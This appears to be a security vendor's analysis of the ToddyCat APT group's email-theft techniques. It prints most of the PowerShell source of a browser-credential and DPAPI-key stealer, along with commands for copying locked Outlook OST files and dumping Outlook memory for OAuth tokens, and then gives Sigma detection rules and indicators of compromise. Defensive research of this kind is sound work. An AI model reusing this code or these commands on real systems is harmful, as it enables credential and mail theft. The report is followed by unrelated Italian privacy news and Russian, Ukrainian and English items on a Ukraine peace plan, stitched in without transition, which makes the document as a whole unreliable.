ToddyCat: your hidden email assistant. Part 1

Introduction

Email remains the main means of business correspondence at organizations. It can be set up either using on-premises infrastructure (for example, by deploying Microsoft Exchange Server) or through cloud mail services such as Microsoft 365 or Gmail.

At first glance, it might seem that using cloud services offers a higher level of confidentiality for corporate correspondence: mail data remains external, even if the organization’s internal infrastructure is compromised. However, this does not stop highly organized espionage groups like the ToddyCat APT group.

This research describes how ToddyCat APT evolved its methods to gain covert access to the business correspondence of employees at target companies. In the first part, we review the incidents that occurred in the second half of 2024 and early 2025. In the second part of the report, we focus in detail on how the attackers implemented a new attack vector as a result of their efforts. This attack enables the adversary to leverage the user’s browser to obtain OAuth 2.0 authorization tokens. These tokens can then be utilized outside the perimeter of the compromised infrastructure to access corporate email.

Additional information about this threat, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

TomBerBil in PowerShell

In a previous post on the ToddyCat group, we described the TomBerBil family of tools, which are designed to extract cookies and saved passwords from browsers on user hosts. These tools were written in C# and C++.

Yet, analysis of incidents from May to June 2024 revealed a new variant implemented in PowerShell. It retained the core malicious functionality of the previous samples but employed a different implementation approach and incorporated new commands.

A key feature of this version is that it was executed on domain controllers on behalf of a privileged user, accessing browser files via shared network resources using the SMB protocol.

Besides supporting the Chrome and Edge browsers, the new version also added processing for Firefox browser files.

The tool was launched using a scheduled task that executed the following command line:
powershell -exec bypass -command "c:\programdata\ip445.ps1"
The script begins by creating a new local directory, which is specified in the $baseDir variable. The tool saves all data it collects into this directory.
$baseDir = 'c:\programdata\temp\'

try{
New-Item -ItemType directory -Path $baseDir | Out-Null
}catch{

}
The script defines a function named parseFile, which accepts the full file path as a parameter. It opens the C:\programdata\uhosts.txt file and reads its content line by line using .NET Framework classes, returning the result as a string array. This is how the script forms an array of host names.
function parseFile{
param(
[string]$fileName
)

$fileReader=[System.IO.File]::OpenText($fileName)

while(($line = $fileReader.ReadLine()) -ne $null){
try{
$line.trim()
}
catch{
}
}
$fileReader.close()
}
For each host in the array, the script attempts to establish an SMB connection to the shared resource c$, constructing the path in the \\\c$\users\ format. If the connection is successful, the tool retrieves a list of user directories present on the remote host. If at least one directory is found, a separate folder is created for that host within the $baseDir working directory:
foreach($myhost in parseFile('c:\programdata\uhosts.txt')){
$myhost=$myhost.TrimEnd()
$open=$false

$cpath = "\\{0}\c$\users\" -f $myhost
$items = @(get-childitem $cpath -Force -ErrorAction SilentlyContinue)

$lpath = $baseDir + $myhost
try{
New-Item -ItemType directory -Path $lpath | Out-Null
}catch{

}
In the next stage, the script iterates through the user folders discovered on the remote host, skipping any folders specified in the $filter_users variable, which is defined upon launching the tool. For the remaining folders, three directories are created in the script’s working folder for collecting data from Google Chrome, Mozilla Firefox, and Microsoft Edge.
$filter_users = @('public','all users','default','default user','desktop.ini','.net v4.5','.net v4.5 classic')

foreach($item in $items){

$username = $item.Name
if($filter_users -contains $username.tolower()){
continue
}
$upath = $lpath + '\' + $username

try{
New-Item -ItemType directory -Path $upath | Out-Null
New-Item -ItemType directory -Path ($upath + '\google') | Out-Null
New-Item -ItemType directory -Path ($upath + '\firefox') | Out-Null
New-Item -ItemType directory -Path ($upath + '\edge') | Out-Null
}catch{

}
Next, the tool uses the default account to search for the following Chrome and Edge browser files on the remote host:

• Login Data: a database file that contains the user’s saved logins and passwords for websites in an encrypted format
• Local State: a JSON file containing the encryption key used to encrypt stored data
• Cookies: a database file that stores HTTP cookies for all websites visited by the user
• History: a database that stores the browser’s history

These files are copied via SMB to the local folder within the corresponding user and browser folder hierarchy. Below is a code snippet that copies the Login Data file:
$googlepath = $upath + '\google\'
$firefoxpath = $upath + '\firefox\'
$edgepath = $upath + '\edge\'
$loginDataPath = $item.FullName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data"
if(test-path -path $loginDataPath){
$dstFileName = "{0}\{1}" -f $googlepath,'Login Data'
copy-item -Force -Path $loginDataPath -Destination $dstFileName | Out-Null
}
The same procedure is applied to Firefox files, with the tool additionally traversing through all the user profile folders of the browser. Instead of the files described above for Chrome and Edge, the script searches for files which have names from the $firefox_files array that contain similar information. The requested files are also copied to the tool’s local folder.
$firefox_files = @('key3.db','signons.sqlite','key4.db','logins.json')

$firefoxBase = $item.FullName + '\AppData\Roaming\Mozilla\Firefox\Profiles'
if(test-path -path $firefoxBase){
$profiles = @(get-childitem $firefoxBase -Force -ErrorAction SilentlyContinue)
foreach($profile in $profiles){
if(!(test-path -path ($firefoxpath + '\' + $profile.Name))){
New-Item -ItemType directory -Path ($firefoxpath + '\' + $profile.Name) | Out-Null
}
foreach($firefox_file in $firefox_files){
$tmpPath = $firefoxBase + '\' + $profile.Name + '\' + $firefox_file
if(test-path -Path $tmpPath){
$dstFileName = "{0}\{1}\{2}" -f $firefoxpath,$profile.Name,$firefox_file
copy-item -Force -Path $tmpPath -Destination $dstFileName | Out-Null
}
}
}
}
The copied files are encrypted using the Data Protection API (DPAPI). The previous version of TomBerBil ran on the host and copied the user’s token. As a result, in the user’s current session DPAPI was used to decrypt the master key, and subsequently, the files. The updated server-side version of TomBerBil copies files containing the user encryption keys that are used by DPAPI. These keys, combined with the user’s SID and password, grant the attackers the ability to decrypt all the copied files locally.
if(test-path -path ($item.FullName + '\AppData\Roaming\Microsoft\Protect')){
copy-item -Recurse -Force -Path ($item.FullName + '\AppData\Roaming\Microsoft\Protect') -Destination ($upath + '\') | Out-Null
}
if(test-path -path ($item.FullName + '\AppData\Local\Microsoft\Credentials')){
copy-item -Recurse -Force -Path ($item.FullName + '\AppData\Local\Microsoft\Credentials') -Destination ($upath + '\') | Out-Null
}
With TomBerBil, the attackers automatically collected user cookies, browsing history, and saved passwords, while simultaneously copying the encryption keys needed to decrypt the browser files. The connection to the victim’s remote hosts was established via the SMB protocol, which significantly complicated the detection of the tool’s activity.

TomBerBil in PowerShell

As a rule, such tools are deployed at later stages, after the adversary has established persistence within the organization’s internal infrastructure and obtained privileged access.

Detection

To detect the implementation of this attack, it’s necessary to set up auditing for access to browser folders and to monitor network protocol connection attempts to those folders.
title: Access To Sensitive Browser Files Via Smb
id: 9ac86f68-9c01-4c9d-897a-4709256c4c7b
status: experimental
description: Detects remote access attempts to browser files containing sensitive information
author: Kaspersky
date: 2025-08-11
tags:
- attack.credential-access
- attack.t1555.003
logsource:
product: windows
service: security
detection:
event:
EventID: '5145'
chromium_files:
ShareLocalPath|endswith:
- '\User Data\Default\History'
- '\User Data\Default\Network\Cookies'
- '\User Data\Default\Login Data'
- '\User Data\Local State'
firefox_path:
ShareLocalPath|contains: '\AppData\Roaming\Mozilla\Firefox\Profiles'
firefox_files:
ShareLocalPath|endswith:
- 'key3.db'
- 'signons.sqlite'
- 'key4.db'
- 'logins.json'
condition: event and (chromium_files or firefox_path and firefox_files)
falsepositives: Legitimate activity
level: medium
In addition, auditing for access to the folders storing the DPAPI encryption key files is also required.
title: Access To System Master Keys Via Smb
id: ba712364-cb99-4eac-a012-7fc86d040a4a
status: experimental
description: Detects remote access attempts to the Protect file, which stores DPAPI master keys
references:
- synacktiv.com/en/publications/…
author: Kaspersky
date: 2025-08-11
tags:
- attack.credential-access
- attack.t1555
logsource:
product: windows
service: security
detection:
selection:
EventID: '5145'
ShareLocalPath|contains: 'windows\System32\Microsoft\Protect'
condition: selection
falsepositives: Legitimate activity
level: medium

Stealing emails from Outlook

The modified TomBerBil tool family proved ineffective at evading monitoring tools, compelling the threat actor to seek alternative methods for accessing the organization’s critical data. We discovered an attempt to gain access to corporate correspondence files in the local Outlook storage.

The Outlook application stores OST (Offline Storage Table) files for offline use. The names of these files contain the address of the mailbox being cached. Outlook uses OST files to store a local copy of data synchronized with mail servers: Microsoft Exchange, Microsoft 365, or Outlook.com. This capability allows users to work with emails, calendars, contacts, and other data offline, then synchronize changes with the server once the connection is restored.

However, access to an OST file is blocked by the application while Outlook is running. To copy the file, the attackers created a specialized tool called TCSectorCopy.

TCSectorCopy

This tool is designed for block-by-block copying of files that may be inaccessible by applications or the operating system, such as files that are locked while in use.

The tool is a 32-bit PE file written in C++. After launch, it processes parameters passed via the command line: the path to the source file to be copied and the path where the result should be saved. The tool then validates that the source path is not identical to the destination path.

Validating the TCSectorCopy command line parameters

Next, the tool gathers information about the disk hosting the file to be copied: it determines the cluster size, file system type, and other parameters necessary for low-level reading.

Determining the disk’s file system type

TCSectorCopy then opens the disk as a device in read-only mode and sequentially copies the file content block by block, bypassing the standard Windows API. This allows the tool to copy even the files that are locked by the system or other applications.

The adversary uploaded this tool to target host and used it to copy user OST files:
xCopy.exe C:\Users\<user>\AppData\Local\Microsoft\Outlook\<email>@<domain>.ost <email>@<domain>.ost2
Having obtained the OST files, the attackers processed them using a separate tool to extract the email correspondence content.

XstReader

XstReader is an open-source C# tool for viewing and exporting the content of Microsoft Outlook OST and PST files. The attackers used XstReader to export the content of the previously copied OST files.

XstReader is executed with the -e parameter and the path to the copied file. The -e parameter specifies the export of all messages and their attachments to the current folder in the HTML, RTF, and TXT formats.
XstExport.exe -e <email>@<domain>.ost2
After exporting the data from the OST file, the attackers review the list of obtained files, collect those of interest into an archive, and exfiltrate it.

Stealing data with TCSectorCopy and XstReader

Detection

To detect unauthorized access to Outlook OST files, it’s necessary to set up auditing for the %LOCALAPPDATA%\Microsoft\Outlook\ folder and monitor access events for files with the .ost extension. The Outlook process and other processes legitimately using this file must be excluded from the audit.
title: Access To Outlook Ost Files
id: 2e6c1918-08ef-4494-be45-0c7bce755dfc
status: experimental
description: Detects access to the Outlook Offline Storage Table (OST) file
author: Kaspersky
date: 2025-08-11
tags:
- attack.collection
- attack.t1114.001
logsource:
product: windows
service: security
detection:
event:
EventID: 4663
outlook_path:
ObjectName|contains: '\AppData\Local\Microsoft\Outlook\'
ost_file:
ObjectName|endswith: '.ost'
condition: event and outlook_path and ost_file
falsepositives: Legitimate activity
level: low
The TCSectorCopy tool accesses the OST file via the disk device, so to detect it, it’s important to monitor events such as Event ID 9 (RawAccessRead) in Sysmon. These events indicate reading directly from the disk, bypassing the file system.

As we mentioned earlier, TCSectorCopy receives the path to the OST file via a command line. Consequently, detecting this tool’s malicious activity requires monitoring for a specific OST file naming pattern: the @ symbol and the .ost extension in the file name.

Example of detecting TCSectorCopy activity in KATA

Stealing access tokens from Outlook

Since active file collection actions on a host are easily tracked using monitoring systems, the attackers’ next step was gaining access to email outside the hosts where monitoring was being performed. Some target organizations used the Microsoft 365 cloud office suite. The attackers attempted to obtain the access token that resides in the memory of processes utilizing this cloud service.

In the OAuth 2.0 protocol, which Microsoft 365 uses for authorization, the access token is used when requesting resources from the server. In Outlook, it is specified in API requests to the cloud service to retrieve emails along with attachments. Its disadvantage is its relatively short lifespan; however, this can be enough to retrieve all emails from a mailbox while bypassing monitoring tools.

The access token is stored using the JWT (JSON Web Tokens) standard. The token content is encoded using Base64. JWT headers for Microsoft applications always specify the typ parameter with the JWT value first. This means that the first 18 characters of the encoded token will always be the same.

The attackers used SharpTokenFinder to obtain the access token from the user’s Outlook application. This tool is written in C# and designed to search for an access token in processes associated with the Microsoft 365 suite. After launch, the tool searches the system for the following processes:

• “TEAMS”
• “WINWORD”
• “ONENOTE”
• “POWERPNT”
• “OUTLOOK”
• “EXCEL”
• “ONEDRIVE”
• “SHAREPOINT”

If these processes are found, the tool attempts to open each process’s object using the OpenProcess function and dump their memory. To do this, the tool imports the MiniDumpWriteDump function from the dbghelp.dll file, which writes user mode minidump information to the specified file. The dump files are saved in the dump folder, located in the current SharpTokenFinder directory. After creating dump files for the processes, the tool searches for the following string pattern in each of them:
"eyJ0eX[a-zA-Z0-9\\._\\-]+"
This template uses the first six symbols of the encoded JWT token, which are always the same. Its structures are separated by dots. This is sufficient to find the necessary string in the process memory dump.

Example of a JWT Token

In the incident being described, the local security tools (EPP) blocked the attempt to create the OUTLOOK.exe process dump using SharpTokenFinder, so the operator used ProcDump from the Sysinternals suite for this purpose:
procdump64.exe -accepteula -ma OUTLOOK.exe
dir c:\windows\temp\OUTLOOK.EXE_<id>.dmp
c:\progra~1\winrar\rar.exe a -k -r -s -m5 -v100M %temp%\dmp.rar c:\windows\temp\OUTLOOK.EXE_<id>.dmp
Here, the operator executed ProcDump with the following parameters:

• accepteula silently accepts the license agreement without displaying the agreement window.
• ma indicates that a full process dump should be created.
• exe is the name of the process to be dumped.

The dir command is then executed as a check to confirm that the file was created and is not zero size. Following this validation, the file is added to a dmp.rar archive using WinRAR. The attackers sent this file to their host via SMB.

Detection

To detect this technique, it’s necessary to monitor the ProcDump process command line for names belonging to Microsoft 365 application processes.
title: Dump Of Office 365 Processes Using Procdump
id: 5ce97d80-c943-4ac7-8caf-92bb99e90e90
status: experimental
description: Detects Office 365 process names in the command line of the procdump tool
author: kaspersky
date: 2025-08-11
tags:
- attack.lateral-movement
- attack.defense-evasion
- attack.t1550.001
logsource:
category: process_creation
product: windows
detection:
selection:
Product: 'ProcDump'
CommandLine|contains:
- 'teams'
- 'winword'
- 'onenote'
- 'powerpnt'
- 'outlook'
- 'excel'
- 'onedrive'
- 'sharepoint'
condition: selection
falsepositives: Legitimate activity
level: high
Below is an example of the ProcDump tool from the Sysinternals package used to dump the Outlook process memory, detected by Kaspersky Anti Targeted Attack (KATA).

Example of Outlook process dump detection in KATA

Takeaways

The incidents reviewed in this article show that ToddyCat APT is constantly evolving its techniques and seeking new ways to conceal its activity aimed at gaining access to corporate correspondence within compromised infrastructure. Most of the techniques described here can be successfully detected. For timely identification of these techniques, we recommend using both host-based EPP solutions, such as Kaspersky Endpoint Security for Business, and complex threat monitoring systems, such as Kaspersky Anti Targeted Attack. For comprehensive, up-to-date information on threats and corresponding detection rules, we recommend Kaspersky Threat Intelligence.

Indicators of compromise

Malicious files
55092E1DEA3834ABDE5367D79E50079A ip445.ps1
2320377D4F68081DA7F39F9AF83F04A2 xCopy.exe
B9FDAD18186F363C3665A6F54D51D3A0 stf.exe

Not-a-virus files
49584BD915DD322C3D84F2794BB3B950 XstExport.exe

File paths
C:\programdata\ip445.ps1
C:\Windows\Temp\xCopy.exe
C:\Windows\Temp\XstExport.exe
c:\windows\temp\stf.exe

PDB
O:\Projects\Penetration\Tools\SectorCopy\Release\SectorCopy.pdb

securelist.com/toddycat-apt-st…

Garante Privacy in crisi: il Segretario Generale lascia dopo la richiesta sulle email dei dipendenti

Il Segretario Generale del Garante per la protezione dei dati personali, Angelo Fanizza, ha rassegnato le proprie dimissioni a seguito di una riunione straordinaria tenuta questa mattina nella sala Rodotà.

Lo riporta ilfattoquotidiano, specificando che l’incontro, convocato in un clima già teso, si è trasformato in uno dei momenti più critici per l’Autorità dalla sua istituzione.

Al centro della vicenda c’è una disposizione che Fanizza aveva rivolto a Cosimo Comella, dirigente responsabile della sicurezza informatica.

L’ordine prevedeva la raccolta integrale delle email di tutti i dipendenti a partire dal marzo 2001 – si parla di un archivio di 24 anni – oltre agli accessi VPN, alle cartelle condivise e alla sospensione dei log interni.

L’obiettivo dichiarato era individuare chi avesse fornito informazioni a Report e al Fatto Quotidiano su questioni interne considerate sensibili.

Comella, il giorno successivo, ha comunicato per iscritto la propria indisponibilità a eseguire la richiesta, definendola in contrasto con le stesse norme emanate dal Garante in materia di tutela dei dati personali.

Nella risposta ha inoltre evidenziato l’impraticabilità tecnica dell’operazione: per archiviare l’intero volume di corrispondenza servirebbero circa 20 mila DVD, oltre 4.000 ore di lavoro e più di un anno e mezzo dedicato alla sola fase di masterizzazione.

La sua posizione è stata letta in assemblea davanti a circa 140-150 dipendenti, che si sono alzati in piedi applaudendolo per diversi minuti.

Durante la pausa, i lavoratori hanno approvato all’unanimità una mozione con cui chiedevano le dimissioni del collegio dirigente e dello stesso Segretario Generale. Nel corso del dibattito, Fanizza avrebbe cercato di coinvolgere la dirigenza per difendere la scelta, senza ricevere alcun sostegno.

Nelle stesse ore, è stato inoltre segnalato un tentativo di accesso non autorizzato ai server dell’Autorità, avvenuto mentre era in corso la ricerca della presunta “talpa”.

Le dimissioni di Fanizza rappresentano il primo atto formale nella gestione della crisi, mentre l’Autorità si prepara ad affrontare le conseguenze istituzionali e operative della vicenda.

L'articolo Garante Privacy in crisi: il Segretario Generale lascia dopo la richiesta sulle email dei dipendenti proviene da Red Hot Cyber.

«Я очень надеюсь, что с украинской стороны никто не причастен». Новые требования России выглядят «абсурдными и неприемлемыми», заявил глава Комитета Верховной Рады Украины по вопросам внешней политики Александр Мережко в интервью Times Radio.

«Я очень надеюсь, что с украинской стороны никто не причастен, потому что это абсолютно абсурдный, нелепый, безграмотный документ, написанный невежественными людьми, которые ничего не понимают…

Европейские чиновники и дипломаты выразили разочарование в связи с изменением подхода США к конфликту на Украине и навязыванием «плохой сделки» Киеву,— Politico

Высокопоставленный европейский чиновник считает, что план Трампа представляет собой список из пунктов, удовлетворяющих требованиям России, и полагает, что это очень плохой план.

Президент Ирана Масуд Пезешкиан заявил, что столицу придётся переносить из Тегерана из-за перенаселения и острого дефицита воды

По его словам, в городе уже идёт «борьба за ресурсы», а инфраструктура мегаполиса не справляется с нагрузкой.

Велика Британія готує війська для України на тлі нових переговорів США, - Bloomberg

Велика Британія визначила, які підрозділи та війська буде направлено в Україну у разі досягнення мирної угоди, а також де розмістяться їхні штаб-квартири.

Axios пише, план Трампа вперше передбачає гарантію безпеки для України за зразком 5 статті НАТО.

Мовляв, США та європейські союзники будуть зобов'язані відреагувати на напад на Україну як на напад на всю "трансатлантичну спільноту".

Ця гарантія діятиме 10 років і може бути продовжена

США очікують підписання угоди Зеленським до 27 листопада – на День подяки. Після цього документ планують передати рф, а весь процес хочуть завершити до початку грудня, – FT.

Як зазначає видання, незрозуміло, чи встигнуть у ці строки: Україна наголошує, що має кілька принципових "червоних ліній".

A few obvious ambushes for #Ukraine in the “28 points peace plan” leaked by Ukrainian media (but note, many sources say it’s not the real plan passed to Ukraine’s government but a modified version):

• 7 b,d - a single attack from Ukraine on Russia basically cancels the whole US guarantees, and it is a fantastic recipe for repeat of 1999 “Basayev’s raid on Dagestan”, that is where a single “rogue commander” can restart the war at a moment suitable for Russia. Alternatively, if Russia can’t recruit any “rogue commander” it can just stage a terrorist attack on its territory unavoidably discovering “Ukrainian traces”. This is literally how Russia cancelled its peace agreement with Ichkeria in 1999.
• 16 - legal ban on invading each other. Except Russia already has a article 353 of Criminal Code which makes it a crime to “plan, prepare or execute an aggressive war” and you can see, Russian courts are overloaded with criminal cases against Putin (not)
• 20 b - removal of any restrictions of Russian and Ukrainian schools and media in both countries. Absurd, granted that there is literally 0 (zero) Ukrainian schools or media in Russia, who has even purged Ukrainian libraries since 2014.
• 20 c - “ban on Nazism” in both countries - the absurdity of this point is that Nazism is already banned in both Russia and Ukraine. Except in Russia, the law called “ban on Nazism” doesn’t really ban Nazism but… anti-Soviet fighters, that may or may not include Nazis. Add to that the highly flexible approach to written law in Russia, which involves absence of prosecution of outright Nazis like Milchakov, “Topaz”, “Espanola”, simply because “they are ours”.
• 21 subpoints about territorial changes chaotically mix de facto recognition and “international recognition” in a way that implies that the Kramators and Slovyansk aglomeration will become a massive legal blackhole, where neither Ukrainian nor Russian armed forces will be present, which of course means control by “Wagner” or some other such shady structure.
• 26 - mutual amnesty for everyone. A fantastic lesson and prize for Russian war criminals which essentially proves that doing war crimes works in long term.
• 27 - “execution of the treaty will be controlled”, except it won’t because another item bans presence of any foreign forces in Ukraine or the occupied territories. Which means there will be no external oversight and it will be the fox who will be guarding the henhouse.

And that’s pretty much it! I don’t see item 6 which assumes “reduction of Ukrainian armed forces to 600’000” as an ambush, because it’s really much higher than it was before 2022 (250k)! Compared to today wartime 1m it’s 40% reduction, but at ceasefire Ukraine won’t be able nor willing to sustain such a large army anyway.

Granted that this is not the final agreement but likely some kind of test for the public opinion I wouldn’t say it’s “capitulation of Ukraine”. Yes, voluntary surrender of Kramatorsk and Slovyansk is painful, but then you need to think how much longer they will hold and at which cost. I don’t know that and I assume only Kyiv knows how much reserves they still have.

I would say the opposite, the plan much more resembles capitulation of Russia because the mere fact that Russia agrees to “line of contact” and exit from Sumy, Kharkiv, Dnipropetrovsk region is a viisible failure of Putin’s explicit 2023 plan of annexation.

Everything else in this plan is Putin’s failure of his 2022 implicit plan of regime change in Ukraine, so in total it’s a complete Russian failure in the war, because at the cost of 1.5m soldiers and setting their economy 10 year back they gain burned out ruins of town they themselves ruined and promise of partial lifting of sanctions, so merely a chance to gradually start returning to pre-2022 trade, except nobody will treat them the same way and trust them.

And at on top of all this they will get ~1m violent and traumatised veterans returning home to… what exactly? Towns that were underinvested shitholes even before 2022 and for the last few years they have degraded even further because Russia redirected all money on the war effort.

Території України не є предметом продажу, а суверенітет – не тема для торгу, – представниця України при ООН Гайовишин.

Київ отримав американський проєкт мирного плану і готовий працювати над ним, але має чіткі "червоні лінії".